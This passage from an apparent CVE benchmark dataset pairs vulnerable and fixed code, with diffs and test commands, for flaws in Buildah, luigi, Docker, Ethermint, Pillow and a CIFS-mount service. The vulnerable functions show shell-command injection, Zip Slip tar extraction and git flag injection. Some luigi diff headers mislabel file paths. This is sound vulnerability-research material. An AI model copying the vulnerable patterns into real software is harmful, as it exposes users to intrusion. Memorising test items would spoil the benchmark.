:= regexp.MatchString(`^[\\w@#*.]{4,30}$`, connection.Username); !ok {\n-\t\tc.JSON(common_err.CLIENT_ERROR, model.Result{Success: common_err.INVALID_PARAMS, Message: common_err.GetMsg(common_err.INVALID_PARAMS)})\n-\t\treturn\n-\t}\n-\tif !ip_helper.IsIPv4(connection.Host) && !ip_helper.IsIPv6(connection.Host) {\n-\t\tc.JSON(common_err.CLIENT_ERROR, model.Result{Success: common_err.INVALID_PARAMS, Message: common_err.GetMsg(common_err.INVALID_PARAMS)})\n-\t\treturn\n-\t}\n-\tif ok, _ := regexp.MatchString(\"^[0-9]{1,6}$\", connection.Port); !ok {\n-\t\tc.JSON(common_err.CLIENT_ERROR, model.Result{Success: common_err.INVALID_PARAMS, Message: common_err.GetMsg(common_err.INVALID_PARAMS)})\n-\t\treturn\n-\t}\n\n--- a/service/connections.go\n+++ b/service/connections.go\n@@ -1,4 +1,12 @@\n-func (s *connectionsStruct) MountSmaba(username, host, directory, port, mountPoint, password string) string {\n-\tstr := command2.ExecResultStr(\"source \" + config.AppInfo.ShellPath + \"/helper.sh ;MountCIFS \" + username + \" \" + host + \" \" + directory + \" \" + port + \" \" + mountPoint + \" \" + password)\n-\treturn str\n+func (s *connectionsStruct) MountSmaba(username, host, directory, port, mountPoint, password string) error {\n+\terr := unix.Mount(\n+\t\tfmt.Sprintf(\"//%s/%s\", host, directory),\n+\t\tmountPoint,\n+\t\t\"cifs\",\n+\t\tunix.MS_NOATIME|unix.MS_NODEV|unix.MS_NOSUID,\n+\t\tfmt.Sprintf(\"username=%s,password=%s\", username, password),\n+\t)\n+\treturn err\n+\t//str := command2.ExecResultStr(\"source \" + config.AppInfo.ShellPath + \"/helper.sh ;MountCIFS \" + username + \" \" + host + \" \" + directory + \" \" + port + \" \" + mountPoint + \" \" + password)\n+\t//return str\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2020-10696", "cve_description": "A path traversal flaw was found in Buildah in versions before 1.14.5. This flaw allows an attacker to trick a user into building a malicious container image hosted on an HTTP(s) server and then write files to the user's system anywhere that the user has permissions.", "cwe_info": {"CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/containers/buildah", "patch_url": ["https://github.com/containers/buildah/commit/c61925b8936e93a5e900f91b653a846f7ea3a9ed"], "programing_language": "Go", "vul_func": [{"id": "vul_go_122_1", "commit": "aba0d4d", "file_path": "imagebuildah/util.go", "start_line": 38, "end_line": 65, "snippet": "func downloadToDirectory(url, dir string) error {\n\tlogrus.Debugf(\"extracting %q to %q\", url, dir)\n\tresp, err := http.Get(url)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"error getting %q\", url)\n\t}\n\tdefer resp.Body.Close()\n\tif resp.ContentLength == 0 {\n\t\treturn errors.Errorf(\"no contents in %q\", url)\n\t}\n\tif err := chrootarchive.Untar(resp.Body, dir, nil); err != nil {\n\t\tresp1, err := http.Get(url)\n\t\tif err != nil {\n\t\t\treturn errors.Wrapf(err, \"error getting %q\", url)\n\t\t}\n\t\tdefer resp1.Body.Close()\n\t\tbody, err := ioutil.ReadAll(resp1.Body)\n\t\tif err != nil {\n\t\t\treturn errors.Wrapf(err, \"Failed to read %q\", url)\n\t\t}\n\t\tdockerfile := filepath.Join(dir, \"Dockerfile\")\n\t\t// Assume this is a Dockerfile\n\t\tif err := ioutil.WriteFile(dockerfile, body, 0600); err != nil {\n\t\t\treturn errors.Wrapf(err, \"Failed to write %q to %q\", url, dockerfile)\n\t\t}\n\t}\n\treturn nil\n}"}, {"id": "vul_go_122_2", "commit": "aba0d4d", "file_path": "imagebuildah/util.go", "start_line": 67, "end_line": 83, "snippet": "func stdinToDirectory(dir string) error {\n\tlogrus.Debugf(\"extracting stdin to %q\", dir)\n\tr := bufio.NewReader(os.Stdin)\n\tb, err := ioutil.ReadAll(r)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"Failed to read from stdin\")\n\t}\n\treader := bytes.NewReader(b)\n\tif err := chrootarchive.Untar(reader, dir, nil); err != nil {\n\t\tdockerfile := filepath.Join(dir, \"Dockerfile\")\n\t\t// Assume this is a Dockerfile\n\t\tif err := ioutil.WriteFile(dockerfile, b, 0600); err != nil {\n\t\t\treturn errors.Wrapf(err, \"Failed to write bytes to %q\", dockerfile)\n\t\t}\n\t}\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_122_1", "commit": "c61925b", "file_path": "imagebuildah/util.go", "start_line": 39, "end_line": 66, "snippet": "func downloadToDirectory(url, dir string) error {\n\tlogrus.Debugf(\"extracting %q to %q\", url, dir)\n\tresp, err := http.Get(url)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"error getting %q\", url)\n\t}\n\tdefer resp.Body.Close()\n\tif resp.ContentLength == 0 {\n\t\treturn errors.Errorf(\"no contents in %q\", url)\n\t}\n\tif err := chrootarchive.Untar(resp.Body, dir, nil); err != nil {\n\t\tresp1, err := http.Get(url)\n\t\tif err != nil {\n\t\t\treturn errors.Wrapf(err, \"error getting %q\", url)\n\t\t}\n\t\tdefer resp1.Body.Close()\n\t\tbody, err := ioutil.ReadAll(resp1.Body)\n\t\tif err != nil {\n\t\t\treturn errors.Wrapf(err, \"Failed to read %q\", url)\n\t\t}\n\t\tdockerfile := filepath.Join(dir, \"Dockerfile\")\n\t\t// Assume this is a Dockerfile\n\t\tif err := ioutils.AtomicWriteFile(dockerfile, body, 0600); err != nil {\n\t\t\treturn errors.Wrapf(err, \"Failed to write %q to %q\", url, dockerfile)\n\t\t}\n\t}\n\treturn nil\n}"}, {"id": "fix_go_122_2", "commit": "c61925b", "file_path": "imagebuildah/util.go", "start_line": 68, "end_line": 84, "snippet": "func stdinToDirectory(dir string) error {\n\tlogrus.Debugf(\"extracting stdin to %q\", dir)\n\tr := bufio.NewReader(os.Stdin)\n\tb, err := ioutil.ReadAll(r)\n\tif err != nil {\n\t\treturn errors.Wrapf(err, \"Failed to read from stdin\")\n\t}\n\treader := bytes.NewReader(b)\n\tif err := chrootarchive.Untar(reader, dir, nil); err != nil {\n\t\tdockerfile := filepath.Join(dir, \"Dockerfile\")\n\t\t// Assume this is a Dockerfile\n\t\tif err := ioutils.AtomicWriteFile(dockerfile, b, 0600); err != nil {\n\t\t\treturn errors.Wrapf(err, \"Failed to write bytes to %q\", dockerfile)\n\t\t}\n\t}\n\treturn nil\n}"}], "vul_patch": "--- a/imagebuildah/util.go\n+++ b/imagebuildah/util.go\n@@ -20,7 +20,7 @@\n \t\t}\n \t\tdockerfile := filepath.Join(dir, \"Dockerfile\")\n \t\t// Assume this is a Dockerfile\n-\t\tif err := ioutil.WriteFile(dockerfile, body, 0600); err != nil {\n+\t\tif err := ioutils.AtomicWriteFile(dockerfile, body, 0600); err != nil {\n \t\t\treturn errors.Wrapf(err, \"Failed to write %q to %q\", url, dockerfile)\n \t\t}\n \t}\n\n--- a/imagebuildah/util.go\n+++ b/imagebuildah/util.go\n@@ -9,7 +9,7 @@\n \tif err := chrootarchive.Untar(reader, dir, nil); err != nil {\n \t\tdockerfile := filepath.Join(dir, \"Dockerfile\")\n \t\t// Assume this is a Dockerfile\n-\t\tif err := ioutil.WriteFile(dockerfile, b, 0600); err != nil {\n+\t\tif err := ioutils.AtomicWriteFile(dockerfile, b, 0600); err != nil {\n \t\t\treturn errors.Wrapf(err, \"Failed to write bytes to %q\", dockerfile)\n \t\t}\n \t}\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-21542", "cve_description": "Versions of the package luigi before 3.6.0 are vulnerable to Arbitrary File Write via Archive Extraction (Zip Slip) due to improper destination file path validation in the _extract_packages_archive function.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/spotify/luigi", "patch_url": ["https://github.com/spotify/luigi/commit/b5d1b965ead7d9f777a3216369b5baf23ec08999"], "programing_language": "Python", "vul_func": [{"id": "vul_py_36_1", "commit": "c9a0d20", "file_path": "luigi/contrib/lsf_runner.py", "start_line": 47, "end_line": 62, "snippet": "def extract_packages_archive(work_dir):\n package_file = os.path.join(work_dir, \"packages.tar\")\n if not os.path.exists(package_file):\n return\n\n curdir = os.path.abspath(os.curdir)\n\n os.chdir(work_dir)\n tar = tarfile.open(package_file)\n for tarinfo in tar:\n tar.extract(tarinfo)\n tar.close()\n if '' not in sys.path:\n sys.path.insert(0, '')\n\n os.chdir(curdir)"}, {"id": "vul_py_36_2", "commit": "c9a0d20", "file_path": "luigi/contrib/sge_runner.py", "start_line": 59, "end_line": 74, "snippet": "def _extract_packages_archive(work_dir):\n package_file = os.path.join(work_dir, \"packages.tar\")\n if not os.path.exists(package_file):\n return\n\n curdir = os.path.abspath(os.curdir)\n\n os.chdir(work_dir)\n tar = tarfile.open(package_file)\n for tarinfo in tar:\n tar.extract(tarinfo)\n tar.close()\n if '' not in sys.path:\n sys.path.insert(0, '')\n\n os.chdir(curdir)"}], "fix_func": [{"id": "fix_py_36_1", "commit": "b5d1b96", "file_path": "luigi/contrib/lsf_runner.py", "start_line": 31, "end_line": 31, "snippet": "from luigi.safe_extractor import SafeExtractor"}, {"id": "fix_py_36_2", "commit": "b5d1b96", "file_path": "luigi/contrib/lsf_runner.py", "start_line": 47, "end_line": 60, "snippet": "def extract_packages_archive(work_dir):\n package_file = os.path.join(work_dir, \"packages.tar\")\n if not os.path.exists(package_file):\n return\n\n curdir = os.path.abspath(os.curdir)\n\n os.chdir(work_dir)\n extractor = SafeExtractor(work_dir)\n extractor.safe_extract(package_file)\n if '' not in sys.path:\n sys.path.insert(0, '')\n\n os.chdir(curdir)"}, {"id": "fix_py_36_3", "commit": "b5d1b96", "file_path": "luigi/contrib/sge_runner.py", "start_line": 39, "end_line": 39, "snippet": "from luigi.safe_extractor import SafeExtractor"}, {"id": "fix_py_36_4", "commit": "b5d1b96", "file_path": "luigi/contrib/sge_runner.py", "start_line": 59, "end_line": 72, "snippet": "def _extract_packages_archive(work_dir):\n package_file = os.path.join(work_dir, \"packages.tar\")\n if not os.path.exists(package_file):\n return\n\n curdir = os.path.abspath(os.curdir)\n\n os.chdir(work_dir)\n extractor = SafeExtractor(work_dir)\n extractor.safe_extract(package_file)\n if '' not in sys.path:\n sys.path.insert(0, '')\n\n os.chdir(curdir)"}, {"id": "fix_py_36_5", "commit": "b5d1b96", "file_path": "luigi/safe_extractor.py", "start_line": 1, "end_line": 97, "snippet": "# -*- coding: utf-8 -*-\n#\n# Copyright 2012-2015 Spotify AB\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n\"\"\"\nThis module provides a class `SafeExtractor` that offers a secure way to extract tar files while\nmitigating path traversal vulnerabilities, which can occur when files inside the archive are\ncrafted to escape the intended extraction directory.\n\nThe `SafeExtractor` ensures that the extracted file paths are validated before extraction to\nprevent malicious archives from extracting files outside the intended directory.\n\nClasses:\n SafeExtractor: A class to securely extract tar files with protection against path traversal attacks.\n\nUsage Example:\n extractor = SafeExtractor(\"/desired/directory\")\n extractor.safe_extract(\"archive.tar\")\n\"\"\"\n\nimport os\nimport tarfile\n\n\nclass SafeExtractor:\n \"\"\"\n A class to safely extract tar files, ensuring that no path traversal\n vulnerabilities are exploited.\n\n Attributes:\n path (str): The directory to extract files into.\n\n Methods:\n _is_within_directory(directory, target):\n Checks if a target path is within a given directory.\n\n safe_extract(tar_path, members=None, \\\\*, numeric_owner=False):\n Safely extracts the contents of a tar file to the specified directory.\n \"\"\"\n\n def __init__(self, path=\".\"):\n \"\"\"\n Initializes the SafeExtractor with the specified directory path.\n\n Args:\n path (str): The directory to extract files into. Defaults to the current directory.\n \"\"\"\n self.path = path\n\n @staticmethod\n def _is_within_directory(directory, target):\n \"\"\"\n Checks if a target path is within a given directory.\n\n Args:\n directory (str): The directory to check against.\n target (str): The target path to check.\n\n Returns:\n bool: True if the target path is within the directory, False otherwise.\n \"\"\"\n abs_directory = os.path.abspath(directory)\n abs_target = os.path.abspath(target)\n prefix = os.path.commonprefix([abs_directory, abs_target])\n return prefix == abs_directory\n\n def safe_extract(self, tar_path, members=None, *, numeric_owner=False):\n \"\"\"\n Safely extracts the contents of a tar file to the specified directory.\n\n Args:\n tar_path (str): The path to the tar file to extract.\n members (list, optional): A list of members to extract. Defaults to None.\n numeric_owner (bool, optional): If True, only the numeric owner will be used. Defaults to False.\n\n Raises:\n RuntimeError: If a path traversal attempt is detected.\n \"\"\"\n with tarfile.open(tar_path, 'r') as tar:\n for member in tar.getmembers():\n member_path = os.path.join(self.path, member.name)\n if not self._is_within_directory(self.path, member_path):\n raise RuntimeError(\"Attempted Path Traversal in Tar File\")\n tar.extractall(self.path, members, numeric_owner=numeric_owner)"}], "vul_patch": "--- a/luigi/contrib/lsf_runner.py\n+++ b/luigi/contrib/lsf_runner.py\n@@ -1,16 +1 @@\n-def extract_packages_archive(work_dir):\n- package_file = os.path.join(work_dir, \"packages.tar\")\n- if not os.path.exists(package_file):\n- return\n-\n- curdir = os.path.abspath(os.curdir)\n-\n- os.chdir(work_dir)\n- tar = tarfile.open(package_file)\n- for tarinfo in tar:\n- tar.extract(tarinfo)\n- tar.close()\n- if '' not in sys.path:\n- sys.path.insert(0, '')\n-\n- os.chdir(curdir)\n+from luigi.safe_extractor import SafeExtractor\n\n--- a/luigi/contrib/sge_runner.py\n+++ b/luigi/contrib/lsf_runner.py\n@@ -1,4 +1,4 @@\n-def _extract_packages_archive(work_dir):\n+def extract_packages_archive(work_dir):\n package_file = os.path.join(work_dir, \"packages.tar\")\n if not os.path.exists(package_file):\n return\n@@ -6,10 +6,8 @@\n curdir = os.path.abspath(os.curdir)\n \n os.chdir(work_dir)\n- tar = tarfile.open(package_file)\n- for tarinfo in tar:\n- tar.extract(tarinfo)\n- tar.close()\n+ extractor = SafeExtractor(work_dir)\n+ extractor.safe_extract(package_file)\n if '' not in sys.path:\n sys.path.insert(0, '')\n \n\n--- /dev/null\n+++ b/luigi/contrib/lsf_runner.py\n@@ -0,0 +1 @@\n+from luigi.safe_extractor import SafeExtractor\n\n--- /dev/null\n+++ b/luigi/contrib/lsf_runner.py\n@@ -0,0 +1,14 @@\n+def _extract_packages_archive(work_dir):\n+ package_file = os.path.join(work_dir, \"packages.tar\")\n+ if not os.path.exists(package_file):\n+ return\n+\n+ curdir = os.path.abspath(os.curdir)\n+\n+ os.chdir(work_dir)\n+ extractor = SafeExtractor(work_dir)\n+ extractor.safe_extract(package_file)\n+ if '' not in sys.path:\n+ sys.path.insert(0, '')\n+\n+ os.chdir(curdir)\n\n--- /dev/null\n+++ b/luigi/contrib/lsf_runner.py\n@@ -0,0 +1,97 @@\n+# -*- coding: utf-8 -*-\n+#\n+# Copyright 2012-2015 Spotify AB\n+#\n+# Licensed under the Apache License, Version 2.0 (the \"License\");\n+# you may not use this file except in compliance with the License.\n+# You may obtain a copy of the License at\n+#\n+# http://www.apache.org/licenses/LICENSE-2.0\n+#\n+# Unless required by applicable law or agreed to in writing, software\n+# distributed under the License is distributed on an \"AS IS\" BASIS,\n+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n+# See the License for the specific language governing permissions and\n+# limitations under the License.\n+#\n+\n+\"\"\"\n+This module provides a class `SafeExtractor` that offers a secure way to extract tar files while\n+mitigating path traversal vulnerabilities, which can occur when files inside the archive are\n+crafted to escape the intended extraction directory.\n+\n+The `SafeExtractor` ensures that the extracted file paths are validated before extraction to\n+prevent malicious archives from extracting files outside the intended directory.\n+\n+Classes:\n+ SafeExtractor: A class to securely extract tar files with protection against path traversal attacks.\n+\n+Usage Example:\n+ extractor = SafeExtractor(\"/desired/directory\")\n+ extractor.safe_extract(\"archive.tar\")\n+\"\"\"\n+\n+import os\n+import tarfile\n+\n+\n+class SafeExtractor:\n+ \"\"\"\n+ A class to safely extract tar files, ensuring that no path traversal\n+ vulnerabilities are exploited.\n+\n+ Attributes:\n+ path (str): The directory to extract files into.\n+\n+ Methods:\n+ _is_within_directory(directory, target):\n+ Checks if a target path is within a given directory.\n+\n+ safe_extract(tar_path, members=None, \\\\*, numeric_owner=False):\n+ Safely extracts the contents of a tar file to the specified directory.\n+ \"\"\"\n+\n+ def __init__(self, path=\".\"):\n+ \"\"\"\n+ Initializes the SafeExtractor with the specified directory path.\n+\n+ Args:\n+ path (str): The directory to extract files into. Defaults to the current directory.\n+ \"\"\"\n+ self.path = path\n+\n+ @staticmethod\n+ def _is_within_directory(directory, target):\n+ \"\"\"\n+ Checks if a target path is within a given directory.\n+\n+ Args:\n+ directory (str): The directory to check against.\n+ target (str): The target path to check.\n+\n+ Returns:\n+ bool: True if the target path is within the directory, False otherwise.\n+ \"\"\"\n+ abs_directory = os.path.abspath(directory)\n+ abs_target = os.path.abspath(target)\n+ prefix = os.path.commonprefix([abs_directory, abs_target])\n+ return prefix == abs_directory\n+\n+ def safe_extract(self, tar_path, members=None, *, numeric_owner=False):\n+ \"\"\"\n+ Safely extracts the contents of a tar file to the specified directory.\n+\n+ Args:\n+ tar_path (str): The path to the tar file to extract.\n+ members (list, optional): A list of members to extract. Defaults to None.\n+ numeric_owner (bool, optional): If True, only the numeric owner will be used. Defaults to False.\n+\n+ Raises:\n+ RuntimeError: If a path traversal attempt is detected.\n+ \"\"\"\n+ with tarfile.open(tar_path, 'r') as tar:\n+ for member in tar.getmembers():\n+ member_path = os.path.join(self.path, member.name)\n+ if not self._is_within_directory(self.path, member_path):\n+ raise RuntimeError(\"Attempted Path Traversal in Tar File\")\n+ tar.extractall(self.path, members, numeric_owner=numeric_owner)\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2024-21542:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/luigi\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\n/workspace/PoC_env/CVE-2024-21542/bin/python -m pytest hand_test.py test/safe_extractor_test.py -xvs\n", "unit_test_cmd": null} {"cve_id": "CVE-2019-13139", "cve_description": "In Docker before 18.09.4, an attacker who is capable of supplying or manipulating the build path for the \"docker build\" command would be able to gain command execution. An issue exists in the way \"docker build\" processes remote git URLs, and results in command injection into the underlying \"git clone\" command, leading to code execution in the context of the user executing the \"docker build\" command. This occurs because git ref can be misinterpreted as a flag.", "cwe_info": {"CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}}, "repo": "https://github.com/moby/moby", "patch_url": ["https://github.com/moby/moby/commit/a588898f99d697e5ff481ecb3b273f45410f10e6"], "programing_language": "Go", "vul_func": [{"id": "vul_go_176_1", "commit": "639880e", "file_path": "builder/remotecontext/git/gitutils.go", "start_line": 78, "end_line": 106, "snippet": "func parseRemoteURL(remoteURL string) (gitRepo, error) {\n\trepo := gitRepo{}\n\n\tif !isGitTransport(remoteURL) {\n\t\tremoteURL = \"https://\" + remoteURL\n\t}\n\n\tvar fragment string\n\tif strings.HasPrefix(remoteURL, \"git@\") {\n\t\t// git@.. is not an URL, so cannot be parsed as URL\n\t\tparts := strings.SplitN(remoteURL, \"#\", 2)\n\n\t\trepo.remote = parts[0]\n\t\tif len(parts) == 2 {\n\t\t\tfragment = parts[1]\n\t\t}\n\t\trepo.ref, repo.subdir = getRefAndSubdir(fragment)\n\t} else {\n\t\tu, err := url.Parse(remoteURL)\n\t\tif err != nil {\n\t\t\treturn repo, err\n\t\t}\n\n\t\trepo.ref, repo.subdir = getRefAndSubdir(u.Fragment)\n\t\tu.Fragment = \"\"\n\t\trepo.remote = u.String()\n\t}\n\treturn repo, nil\n}"}, {"id": "vul_go_176_2", "commit": "639880e", "file_path": "builder/remotecontext/git/gitutils.go", "start_line": 120, "end_line": 128, "snippet": "func fetchArgs(remoteURL string, ref string) []string {\n\targs := []string{\"fetch\"}\n\n\tif supportsShallowClone(remoteURL) {\n\t\targs = append(args, \"--depth\", \"1\")\n\t}\n\n\treturn append(args, \"origin\", ref)\n}"}], "fix_func": [{"id": "fix_go_176_1", "commit": "a588898", "file_path": "builder/remotecontext/git/gitutils.go", "start_line": 78, "end_line": 111, "snippet": "func parseRemoteURL(remoteURL string) (gitRepo, error) {\n\trepo := gitRepo{}\n\n\tif !isGitTransport(remoteURL) {\n\t\tremoteURL = \"https://\" + remoteURL\n\t}\n\n\tvar fragment string\n\tif strings.HasPrefix(remoteURL, \"git@\") {\n\t\t// git@.. is not an URL, so cannot be parsed as URL\n\t\tparts := strings.SplitN(remoteURL, \"#\", 2)\n\n\t\trepo.remote = parts[0]\n\t\tif len(parts) == 2 {\n\t\t\tfragment = parts[1]\n\t\t}\n\t\trepo.ref, repo.subdir = getRefAndSubdir(fragment)\n\t} else {\n\t\tu, err := url.Parse(remoteURL)\n\t\tif err != nil {\n\t\t\treturn repo, err\n\t\t}\n\n\t\trepo.ref, repo.subdir = getRefAndSubdir(u.Fragment)\n\t\tu.Fragment = \"\"\n\t\trepo.remote = u.String()\n\t}\n\n\tif strings.HasPrefix(repo.ref, \"-\") {\n\t\treturn gitRepo{}, errors.Errorf(\"invalid refspec: %s\", repo.ref)\n\t}\n\n\treturn repo, nil\n}"}, {"id": "fix_go_176_2", "commit": "a588898", "file_path": "builder/remotecontext/git/gitutils.go", "start_line": 125, "end_line": 133, "snippet": "func fetchArgs(remoteURL string, ref string) []string {\n\targs := []string{\"fetch\"}\n\n\tif supportsShallowClone(remoteURL) {\n\t\targs = append(args, \"--depth\", \"1\")\n\t}\n\n\treturn append(args, \"origin\", \"--\", ref)\n}"}], "vul_patch": "--- a/builder/remotecontext/git/gitutils.go\n+++ b/builder/remotecontext/git/gitutils.go\n@@ -25,5 +25,10 @@\n \t\tu.Fragment = \"\"\n \t\trepo.remote = u.String()\n \t}\n+\n+\tif strings.HasPrefix(repo.ref, \"-\") {\n+\t\treturn gitRepo{}, errors.Errorf(\"invalid refspec: %s\", repo.ref)\n+\t}\n+\n \treturn repo, nil\n }\n\n--- a/builder/remotecontext/git/gitutils.go\n+++ b/builder/remotecontext/git/gitutils.go\n@@ -5,5 +5,5 @@\n \t\targs = append(args, \"--depth\", \"1\")\n \t}\n \n-\treturn append(args, \"origin\", ref)\n+\treturn append(args, \"origin\", \"--\", ref)\n }\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-35936", "cve_description": "Ethermint is an Ethereum library. In Ethermint running versions before `v0.17.2`, the contract `selfdestruct` invocation permanently removes the corresponding bytecode from the internal database storage. However, due to a bug in the `DeleteAccount`function, all contracts that used the identical bytecode (i.e shared the same `CodeHash`) will also stop working once one contract invokes `selfdestruct`, even though the other contracts did not invoke the `selfdestruct` OPCODE. This vulnerability has been patched in Ethermint version v0.18.0. The patch has state machine-breaking changes for applications using Ethermint, so a coordinated upgrade procedure is required. A workaround is available. If a contract is subject to DoS due to this issue, the user can redeploy the same contract, i.e. with identical bytecode, so that the original contract's code is recovered. The new contract deployment restores the `bytecode hash -> bytecode` entry in the internal state.", "cwe_info": {"CWE-668": {"name": "Exposure of Resource to Wrong Sphere", "description": "The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource."}}, "repo": "https://github.com/evmos/ethermint", "patch_url": ["https://github.com/evmos/ethermint/commit/144741832007a26dbe950512acbda4ed95b2a451"], "programing_language": "Go", "vul_func": [{"id": "vul_go_58_2", "commit": "bead29c", "file_path": "x/evm/keeper/statedb.go", "start_line": 181, "end_line": 221, "snippet": "func (k *Keeper) DeleteAccount(ctx sdk.Context, addr common.Address) error {\n\tcosmosAddr := sdk.AccAddress(addr.Bytes())\n\tacct := k.accountKeeper.GetAccount(ctx, cosmosAddr)\n\tif acct == nil {\n\t\treturn nil\n\t}\n\n\t// NOTE: only Ethereum accounts (contracts) can be selfdestructed\n\tethAcct, ok := acct.(ethermint.EthAccountI)\n\tif !ok {\n\t\treturn sdkerrors.Wrapf(types.ErrInvalidAccount, \"type %T, address %s\", acct, addr)\n\t}\n\n\t// clear balance\n\tif err := k.SetBalance(ctx, addr, new(big.Int)); err != nil {\n\t\treturn err\n\t}\n\n\t// remove code\n\tcodeHashBz := ethAcct.GetCodeHash().Bytes()\n\tif !bytes.Equal(codeHashBz, types.EmptyCodeHash) {\n\t\tk.SetCode(ctx, codeHashBz, nil)\n\t}\n\n\t// clear storage\n\tk.ForEachStorage(ctx, addr, func(key, _ common.Hash) bool {\n\t\tk.SetState(ctx, addr, key, nil)\n\t\treturn true\n\t})\n\n\t// remove auth account\n\tk.accountKeeper.RemoveAccount(ctx, acct)\n\n\tk.Logger(ctx).Debug(\n\t\t\"account suicided\",\n\t\t\"ethereum-address\", addr.Hex(),\n\t\t\"cosmos-address\", cosmosAddr.String(),\n\t)\n\n\treturn nil\n}"}], "fix_func": [{"id": "fix_go_58_2", "commit": "1447418", "file_path": "x/evm/keeper/statedb.go", "start_line": 180, "end_line": 214, "snippet": "func (k *Keeper) DeleteAccount(ctx sdk.Context, addr common.Address) error {\n\tcosmosAddr := sdk.AccAddress(addr.Bytes())\n\tacct := k.accountKeeper.GetAccount(ctx, cosmosAddr)\n\tif acct == nil {\n\t\treturn nil\n\t}\n\n\t// NOTE: only Ethereum accounts (contracts) can be selfdestructed\n\t_, ok := acct.(ethermint.EthAccountI)\n\tif !ok {\n\t\treturn sdkerrors.Wrapf(types.ErrInvalidAccount, \"type %T, address %s\", acct, addr)\n\t}\n\n\t// clear balance\n\tif err := k.SetBalance(ctx, addr, new(big.Int)); err != nil {\n\t\treturn err\n\t}\n\n\t// clear storage\n\tk.ForEachStorage(ctx, addr, func(key, _ common.Hash) bool {\n\t\tk.SetState(ctx, addr, key, nil)\n\t\treturn true\n\t})\n\n\t// remove auth account\n\tk.accountKeeper.RemoveAccount(ctx, acct)\n\n\tk.Logger(ctx).Debug(\n\t\t\"account suicided\",\n\t\t\"ethereum-address\", addr.Hex(),\n\t\t\"cosmos-address\", cosmosAddr.String(),\n\t)\n\n\treturn nil\n}"}], "vul_patch": "--- a/x/evm/keeper/statedb.go\n+++ b/x/evm/keeper/statedb.go\n@@ -6,7 +6,7 @@\n \t}\n \n \t// NOTE: only Ethereum accounts (contracts) can be selfdestructed\n-\tethAcct, ok := acct.(ethermint.EthAccountI)\n+\t_, ok := acct.(ethermint.EthAccountI)\n \tif !ok {\n \t\treturn sdkerrors.Wrapf(types.ErrInvalidAccount, \"type %T, address %s\", acct, addr)\n \t}\n@@ -14,12 +14,6 @@\n \t// clear balance\n \tif err := k.SetBalance(ctx, addr, new(big.Int)); err != nil {\n \t\treturn err\n-\t}\n-\n-\t// remove code\n-\tcodeHashBz := ethAcct.GetCodeHash().Bytes()\n-\tif !bytes.Equal(codeHashBz, types.EmptyCodeHash) {\n-\t\tk.SetCode(ctx, codeHashBz, nil)\n \t}\n \n \t// clear storage\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-35936:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/ethermint\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ncd ./x/evm/keeper && go test -timeout 30s -testify.m ^TestSuicide$ github.com/evmos/ethermint/x/evm/keeper\n", "unit_test_cmd": null} {"cve_id": "CVE-2023-50447", "cve_description": "Pillow through 10.1.0 allows PIL.ImageMath.eval Arbitrary Code Execution via the environment parameter, a different vulnerability than CVE-2022-22817 (which was about the expression parameter).", "cwe_info": {"CWE-94": {"name": "Improper Control of Generation of Code ('Code Injection')", "description": "The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment."}, "CWE-77": {"name": "Improper Neutralization of Special Elements used in a Command ('Command Injection')", "description": "The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component."}, "CWE-78": {"name": "Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')", "description": "The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component."}}, "repo": "https://github.com/python-pillow/Pillow", "patch_url": ["https://github.com/python-pillow/Pillow/commit/45c726fd4daa63236a8f3653530f297dc87b160a"], "programing_language": "Python", "vul_func": [{"id": "vul_py_347_1", "commit": "c3af2643ddddfc80a509a1060db253e7930c2adc", "file_path": "src/PIL/ImageMath.py", "start_line": 222, "end_line": 260, "snippet": "def eval(expression, _dict={}, **kw):\n \"\"\"\n Evaluates an image expression.\n\n :param expression: A string containing a Python-style expression.\n :param options: Values to add to the evaluation context. You\n can either use a dictionary, or one or more keyword\n arguments.\n :return: The evaluated expression. This is usually an image object, but can\n also be an integer, a floating point value, or a pixel tuple,\n depending on the expression.\n 